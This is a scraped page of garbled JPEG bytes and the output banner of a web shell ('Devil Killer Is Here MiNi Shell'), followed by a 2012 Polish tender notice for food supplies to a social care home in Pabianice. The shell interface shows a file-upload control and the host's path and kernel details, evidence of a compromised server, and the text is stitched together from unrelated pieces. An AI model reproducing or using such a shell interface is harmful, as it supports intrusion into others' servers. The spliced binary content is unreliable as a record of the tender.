JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472260-N-2012.html

<p class="kh_header"><b>Pabianice: Dostawa  artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie od 02.01.2013r do 31.12.2013r</b><br>
<b>Numer ogłoszenia: 472260 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 042 2137551, faks 042 2137640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pabianice-dps.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie od 02.01.2013r do 31.12.2013r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Dostawa artykułów spożywczych konfekcjonowanych (Kod Wspólnego Słownika  
     Zamówień- 15000000-8, 15850000-1, 15800000-6)

1.	Barszcz czerwony koncentrat 		min   320g
max 500g	kg	32
2.	Chrzan z kwaskiem cytrynowym skład: korzeń chrzanu  nie mniej niż 52% , woda, cukier, olej roślinny		min  300g
max 450g	kg	30
3.	Ćwikła z chrzanem, skład: buraczki ćwikłowe nie mniej niż 61% ,świeży korzeń chrzanu nie mniej niż 19%		min 350g
max 450g	kg	35

4.
	Dżem wiśniowy, (zawartość owoców  nie mniej niż 35g na 100g produktu lub proporcjonalnie)		min 280g
max 450g	kg	280

5.
	Dżem truskawkowy, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	140
6.	Fasola Jaś paczkowana ,ziarno wielkości od 18-25mm, białe bez przebarwień		min 400g
max 5kg	     kg	100
7.	Fasola konserwowa, (po odcieku nie mniej niż  280g lub proporcjonalnie)		min 460g
max 620g	kg	92
8.	Groszek konserwowy,( ze świeżego ziarna, po odcieku nie mnij niż 120g lub proporcjonalnie)		min 200g
max 400 g	kg	240
9.	Groch suchy łupany paczkowany		min 400g
max 5 kg	kg	50
10.	Koncentrat pomidorowy nie mniej niż 30% ze świeżych pomidorów typu Włocławek lub równoważny		min 970g
max 1000g	kg	340
11.	Koncentrat pomidorowy nie mniej niż 30%  ze świeżych pomidorów typu Włocławek lub równoważny		min 200g
max 300g	kg	40
12.	Kompot wiśniowy na cukrze (zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75 A-75953
		min 900g
max 1000g	kg	1440
13.	Kompot  truskawkowy na cukrze(zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75 A-75953		min 900g
max 1000g	kg	180
14.	Kompot z czarnej porzeczki na cukrze (zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75 A-75953		min 900g
max 1000g	kg	180
15.	Ogórki konserwowe (po odcieku nie mniej niż 490g lub proporcjonalnie) PN-75 A-75953
		    min 900g
   max  1500g	kg	1080
16.	Kukurydza konserwowa (po odcieku nie mniej niż 220g lub proporcjonalnie)		min 400g
max 440g	kg	120
17.	Szczaw konserwowy  		min 320g
max 900g	kg	80
18.	Syrop owocowy typu  Paola lub równoważny (zagęszczony wysokosłodzony, pasteryzowany zawierający  syrop glukozowo-fruktozowy, cukier)		min 430ml
max 1000ml	l	    129
19.	Cukier paczkowany		min1kg
max 3kg	kg	4000
 20.	Cukier puder		min 400g
max 1kg	kg	100
 21.	Cukier wanilinowy 		min  32g
max 64g	kg	12,80
22.	Sól spożywcza, paczkowana, warzona, jodowana		min 1kg
max 5kg	kg	900
23.	Herbatka owocowa expresowa 
w torebkach 		min 30g
max 50g 	kg	4,50
24.	Herbata granulowana czarna, kraj pochodzenia Indie grube granulki bez zanieczyszczeń		min 100g
max 200g	kg	150
25.	Kawa Inka		min 150g
max 300g	kg	23
26.	Kakao ciemne(zawartość tłuszczu nie mniej niż 10-12% )		min 100g
max 200g	kg	25
27.	Liść laurowy		min 8g
max 50g	kg	1,60
28.	Majeranek		min 20g
max 50g	kg	4
29.	Pieprz mielony(zawartość pieprzu 100%)		min 20g
max 50g	kg	14
30.	Żelatyna 		min 50g
max 200g	kg	5
31.	Cynamon		min 20g
max 50g	kg	6
32.	Przyprawa typu Warzywko (zawartość suszonych warzyw nie mniej niż 15,1% zawierająca  pomidory)		min 75g
max 200g	kg	7,50
33	Przyprawa typu Vegeta(zawartość suszonych warzyw nie mniej niż 15,5%)		min 75g
max 200g	kg	7,5
34.	Przyprawa typu Degusta (zawartość warzyw nie mniej niż 14%)		min 75g
max 200g	kg	7,5
35.	Proszek do pieczenia		min 36g
max 50g	kg	350
36.	Papryka konserwowa (po odcieku nie mniej niż 320g lub proporcjonalnie)		min 670g
max 900g	kg	12,60
37.	Zupa pieczarkowa w proszku		min 60g
max 100g	kg	       60
38.	Zupa grochowa w proszku		min 45g
max 100g	kg	4,50
39.	Aromat		min 10g
max 20g	kg	2,50
40.	Budyń śmietankowy, waniliowy, malinowy,		min 41g
max 50g	kg	287
41.	Kisiel wiśniowy, truskawkowy, cytrynowy, żurawinowy		min 40g
max 50g	kg	240
42.	Słodzik 100 tabletek		min 4g
max 5g	kg	2,40
43.	Rosołki drobiowe, wołowe		min 60g
max 100g	kg	48
44.	Ocet		min 500ml
max 1l	l	20
45.	Przyprawa do zup w płynie		min 1kg
max 1,50lkg	kg	100
46.	Musztarda delikatesowa		min190g
max 250g	kg	76
47.	Kwasek cytrynowy		min 20g
max 50g	kg	14
48.	Majonez skład: olej roślinny, żółtko jaj nie mniej niż 6%, ocet, musztarda, kwas cytrynowy		min 400ml
max 620ml	l	200
49.	Ziele angielskie		min 15g
max 50g	kg	3
50.	Makaron z mąki makaronowej		       min 500g
       max 1000g	kg	1000

51.	Makaron z semoliny 100% typu Lubella lub równoważny		min 500g
max 1000g	kg	500
52.	Papryka słodka w proszku		min 20g
max 50g	kg	1,20
53.	Masło roślinne 		min 250g
max 500g	kg	500
54.	Ketchup  typu Włocławek lub równoważny (skład:100g produktu uzyskane z co najmniej 163g pomidorów lub proporcjonalnie)
		min 480g
max 500g	kg	120
55.
	Ryż paczkowany, długoziarnisty, gat. I 		min 1kg
max 3 kg	kg	1000
56.
	Mąka ziemniaczana paczkowana		min 500g
max 1 kg	kg	250
57.
	Mąka pszenna paczkowana typ 480		min 1kg
max 3 kg	kg	3500
58.	Kasza gryczana palona paczkowana gat. I		min 500g
max 5kg	kg	200
59.	Kaszka ml-ryżowa, na mleko nie mniej niż 38% mleko modyfikowane, nie mniej niż 32% odtłuszczone mleko w proszku 		min 230g
max 500g	kg	11,50
60.	Kasza manna paczkowana		min 1kg
max 3kg	kg	300
61.	Kasza jęczmienna średnia paczkowana		min 1kg
max 3 kg	kg	200
62.	Płatki owsiane górskie paczkowane (do zalewania wrzątkiem)		 min 500g
max 1 kg	kg	100
63.
	Olej rzepakowy 		min 1l
max 3l	l	600
64.
	Olej rzepakowy 		
 0,50 l	l	50
65.	Miód wielokwiatowy typu Tymbark lub równoważny ,kubek plastikowy (nie torebka)		min 25g
max 30g	kg	212,50
66.	Kleik ryżowy na mleko (skład: mąka ryżowa 100%, witamina B1)		min 170g
max 500g	kg	8,50
67.	Suchary delikatesowe		min 290g
max 500g	kg	14,50
68.	Listki waflowe bez cukru dla diabetyków		min 32g
max 100g	kg	16

69.	
Wafelki bez cukru dla diabetyków		min 40g
max 100g	kg	20
70.	Herbatniki lekkie bez cukru dla diabetyków		min 73g
max 100g	kg	36,50
71.	Biszkopty paczkowane		min 250g
max 500g	kg	225
72.	Smalec paczkowany		min 200g
max 500g	kg	100
73.	Grzyby suszone podgrzybki,     nie krojone 		min 500g
max 1kg	kg	4
74.	Jabłka suszone		min 500g
max 2kg	kg	12
75.	Śliwki bez pestek suszone		min 500g
max 2kg	kg	12
76.	Galaretka truskawkowa		min 70g
max 100g	kg	56
77.	Brzoskwinie w puszce		min 800g
max 850g	kg	80
78.	Dżem bez cukru: czarna porzeczka, wiśnia ,truskawka, brzoskwinia, malina, zawartość owoców  nie mniej niż 50%, fruktoza nie mniej niż 28% 		min 190g
max 250g	kg	475
79.	Czosnek suszony		min 20g
max 50g	kg	4
80.	Margaryna zwykła kostka		min 250g
max 500g	kg	250
B. Dostawa wędlin (Kod Wspólnego Słownika Zamówień  15130000-8)
1.	Baleron wędzony parzony (zawartość mięsa wieprzowego nie mniej niż 69%)			kg	300
2.	Bekon wędzony parzony (zawartość mięsa wieprzowego nie mniej niż 69%)			kg	50
3.	Boczek wędzony parzony, bez  żeber 
(zawartość mięsa wieprzowego z tłuszczem nie mniej niż 79%)			kg	250
 4.	Kaszanka cienka
(skład: kasza gryczana, wątroba, krew, przyprawy)			kg	300
 5.	Kiełbasa mortadela
(zawartość mięsa wieprzowego nie mniej niż 38%)			kg	200
6.	Kiełbasa parówki cienkie
(zawartość mięsa wieprzowego nie mniej niż 38%)			kg	400
7.	Kiełbasa parówki grube
(zawartość mięsa wieprzowego nie mniej niż 38%)			kg	40
8.	Kiełbasa krakowska
(średnio rozdrobniona, wędzona, parzona, zawartość mięsa wieprzowego nie mniej niż 55%)			kg	500
9.	Kiełbasa szynkowa
(grubo rozdrobniona, wędzona, parzona, zawartość mięsa wieprzowego nie mniej niż 59%)			kg	400
10.	Kiełbasa typu szkolna lub równoważna
(średnio rozdrobniona, wędzona, parzona, zawartość mięsa wieprzowego nie mniej niż 55%)			kg	300
11.	Mielonka tyrolska
(wyrób blokowy, średnio rozdrobniony, mięsa wieprzowego nie mniej niż  66 %)			kg	200
12.	Kiełbasa typu złota lub równoważna /cienka/
(średnio rozdrobniona, drobiowo-wieprzowa, zawartość mięsa drobiowego nie mniej niż 38%, mięsa wieprzowego nie mniej niż 39%)			kg	500
13.	Kiełbasa śląska /cienka/
(średnio rozdrobniona, wędzona, parzona, mięsa wieprzowego nie mniej niż 76%)		kg	200
14.	Kiełbasa biała surowa
(średnio rozdrobniona, zawartość mięsa wieprzowego nie mniej niż 85%)			kg	100
15.	Łopatka pieczona
(wyrób garmażeryjny, nie rozdrobniony, parzony,i opiekany, zawartość mięsa wieprzowego nie mniej niż 84%)			kg	100
16.	Ogonówka wędzona parzona 
(zawartość mięsa wieprzowego nie mniej niż 69%)			kg	350
17.	Pasztet wieprzowy typu wiejski lub równoważny
(wyrób garmażeryjny,  rozdrobniony, zawartość mięsa wieprz. nie mniej niż 3%, mięso drobiowe nie mniej niż 6%,wątroba,tłuszcz wieprzowy, tłuszcz drobiowy)			kg	350
18.	Przysmak typu śniadaniowy lub równoważny
(wyrób blokowy, średnio rozdrobniony, parzony, zawartość mięsa wieprzowego nie mniej niż 50%)			kg	200

19.Pieczeń typu rzymska lub równoważna
(wyrób garmażeryjny, z mięsa wieprz., rozdrobniony, parzony zawartość mięsa wieprzowego nie mniej niż 80%)		kg	100

  20.Pieczeń o smaku indyka  lub równoważna
(wyrób garmażeryjny z mięsa wieprzowego, rozdrobniony, parzony, opiekany, zawartość mięsa wieprzowego nie mniej niż 63%)		kg	100
21.	Polędwica sopocka, wędzona, parzona
(zawartość mięsa wieprzowego nie mniej niż 65%)		kg	200
22.	Polędwica drobiowa
(zawartość mięsa drobiowego nie mniej niż    43%, mięsa wieprzowego nie mniej niż 6 %)			kg	350
23.	Rolada z kurczaka
(zawartość mięsa drobiowego z kurcząt nie mniej niż 67%)			kg	400
24.	Schab z kurczaka, wędzony, parzony
(zawartość mięsa drobiowego z kurcząt nie mniej niż 89%)			kg	100
25.	Szynka konserwowa
(grubo rozdrobniona, parzona zawartość mięsa wieprzowego nie mniej niż 69%)			kg	200
26.	Szynka typu  biała lub równoważna
(nie wędzona, parzona, zawartość mięsa   wieprzowego nie mniej niż 59%)			kg	400
27.	Szynka drobiowa
(wędzona, parzona, zawartość mięsa drobiowego nie mniej niż 43%, mięsa  wieprzowego nie mniej niż 6%)			kg	200
28.	Szynka chuda, gotowana
(w siatce, wędzona, parzona,  zawartość mięsa   wieprzowego nie mniej niż 65%)			kg	350
29.	Schab pieczony
(wyrób garmażeryjny, nie rozdrobniony, parzony i opiekany, zawartość mięsa wieprzowego nie mniej niż 84%)			kg	50
30.	Salceson czarny ozorowy
zawartość mięsa  wieprzowego nie mniej niż 13%, ozory wp, serca wp, nerki wp)			kg	80
31.	Salceson biały
zawartość mięsa wieprzowego nie mniej niż 50%, serca wieprzowe)			kg	80
C. Dostawa mięsa (Kod Wspólnego Słownika Zamówień  15110000-2)
1.	Brzuch surowy bez skóry, bez żeber			kg	100
2.	Kości schabowo-karczkowe			kg	1500
3.	Łopatka bez kości			kg	1500
 4.	Schab bez kości			kg	500
 5.	Nogi wieprzowe krótkie			kg	120
6.	Słonina			kg	400
7.	Wołowina bez kości, zrazowa			kg	200
8.	Karczek bez kości			kg	250
9.	Golonka tylnia			kg	50
D.Dostawa mięsa drobiowego ( Kod  Wspólnego Słownika Zamówień  15110000-2)
     15200000-0)         
1.	Filet z kurczaka			kg	400
2.	Kurczak świeży			kg	1500
3.	Udko z kurczaka			kg	1300
4.	Mięso drobiowe bez kości		kg	600
5.	Porcja rosołowa 			kg	500
6.	Wątróbka drobiowa			kg	70
E. Dostawy ryb i przetworów rybnych  (Kod  Wspólnego Słownika Zamówień 15220000-6, 15200000-0)
         1.	Filet z ryb mrożonych panga 		kg	600	
2.	Filet z ryb mrożonych mintaj ( nie z dostaw chińskich)		kg	200	
3.	Filet z ryb mrożonych morszczuk ( nie z dostaw chińskich)		kg	200	
4.	Śledzie płaty 			kg	100	
5.	Makrela wędzona			kg	100	
F. Dostawa artykułów mleczarskich ( Kod Wspólnego Słownika Zamówień 15500000-3, 15510000-6,   15540000-5)

1.	Mleko  pasteryzowane, homogenizowane, (zawartość tłuszczu 2%, folia) 		min 3 l
max 5 l	l	21000
2.	Masło Extra, 
(zawartość tłuszczu nie mniej niż 82% , paczkowane)		min 200g
max 250g	kg	3300
3.	Serek homogenizowany (smak waniliowy, truskawkowy, malinowy)		min 150g
max 170g	kg	800
 4.	Ser biały, twarogowy, półtłusty, paczkowany, terminizowany		min 250g
max 1kg	kg	1500
 5.	Serek typu kanapkowy lub równoważny, 
(serek twarogowy, kremowy, naturalny, terminizowany, zawartość tłuszczu nie mniej niż 12%)		min 100g
max 140g	kg	500
 6.	Serek topiony kremowy (terminizowany, zawartość tłuszczu nie mniej niż 27%)		min 50g
max 100g	     kg	500
7.	Ser żółty pełnotłusty  typu Gouda lub równoważny
( zawartość tłuszczu nie mniej niż 26% )		---	kg	300
8.	Śmietana homogenizowana, (zawartość tłuszczu 18%)		min 200g
max 400g	kg	400
9.	Jogurt naturalny (zawartość tłuszczu nie mniej niż 2%)		min 150g
max 500g	kg	280
10.	Jogurt owocowy z kawałkami owoców,
(skład: nie mniej niż 9% owoców, sok z owoców, cukier, mleko w proszku odtłuszczone)		min 125g
max 170g	kg	500
G. Dostawa pieczywa ( Kod  Wspólnego Słownika Zamówień - 15810000-9)   
                     


1.	Chleb pszenny, krojony, paczkowany		min 600g
max 1kg	kg	13 800	

2.	Chleb razowy, krojony, paczkowany		min 400g
max 600g	kg	320	

3.	
Bułka pszenna		min 40g
max 60g	kg	2200	
 
 4.
	Bułka tarta, paczkowana		min 500g
max 1kg	kg	500	

5.
	Drożdże		min 250g
max 1kg	kg	100	
6.
	Żurek		min 1l
max 5 l	     l	600	

7.
 	Rogal maślany		min 80g
max 100g	kg	630	

8.
 	Angielka krojona, paczkowana		min 300g
max 500g	kg	2100	

   H. Dostawa warzyw ( Kod  Wspólnego Słownika Zamówień - 03220000-9)
       
 1.	Buraki			kg	2000	
 2.	Botwina		       	pęczki	200	
 3.	Brukselka			kg	200	
  4.	Brokuł	                         szt	600	
  5.	Cebula			kg	1200	
  6.	Czosnek			szt	150	
7.	Fasolka szparagowa			kg	  100	
8.	Kalafior			szt	1000	
9.	Koperek                         kg	  200	
10.	Kapusta biała	kg	2000	
11.	Kapusta czerwona			kg	  200	
12.	Kapusta pekińska			kg	  250	
13.	Marchew			kg	   4500	
14.	Ogórek zielony			kg	  800	
15.	Pietruszka			kg	   1200	
16.	Nać pietruszki			kg	  200	
17.	Por			kg	  200	
18.	Pomidory			kg	   4000	
19.	Pieczarki			kg	  150	
 20.	Rzodkiewka		pęczki	  500	
 21.	Sałata			szt	   6000	
 22.	Seler			kg	  800	
 23.	Szczypiorek		pęczki	  600	

I. Dostawa ziemniaków ( Kod  Wspólnego Słownika Zamówień - 03212100-1)

1.	Ziemniaki jadalne, klasa I
(pakowane w workach)		min 10 kg
max 20 kg	kg	41 000	
J. Dostawa jabłek ( Kod  Wspólnego Słownika Zamówień -  03220000-9)

1.	Jabłka klasa I
( pakowane w skrzynki plastikowe lub drewniane)		min 10 kg
max 20 kg	kg	5000
K. Dostawa kapusty kiszonej i ogórków kiszonych (Kod Wspólnego Słownika Zamówień   -15330000-0)
1.	Kapusta kiszona			kg	1 800	
2.	Ogórek kiszony			kg	2 000
	
L. Dostawa jajek  (Kod Wspólnego Słownika zamówień - 03142500-3)
1.	Jajka kurze świeże, 
klasa L			szt	48 000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.85.00.00-1, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie załącznika nr 2 do niniejszej specyfikacji, który winny być załączony do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia stanowiącego załącznik nr 2 oraz załącznik nr 5 do niniejszej specyfikacji, które winny być załączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   załącznika nr 2 do niniejszej specyfikacji, który winny być załączony do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   załącznika nr 2 do niniejszej specyfikacji, który winny być załączony do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza  możliwość zmiany cen w przypadku dostaw warzyw, jabłek, ziemniaków, kapusty i ogórków kiszonych (załączniki nr 4 H, I, J, K). Wzrost cen zaproponowany przez Wykonawcę nie może przewyższać wysokości cen obowiązujących w danym okresie na targowisku (Zjazdowa)w Łodzi, publikowanym na stronie internetowej www.zjazdowa.com.pl . W pozostałych asortymentach ceny pozostają stałe w ciągu całego roku, z wyjątkiem ustawowej  zmiany stawki podatku VAT, wprowadzonych na podstawie przepisów prawa, przy czym zmianie ulegnie wyłącznie cena brutto danego towaru. W takim przypadku wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji, bez konieczności zmiany umowy, odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Pabianicach ul. Wiejska 55-61.</p>
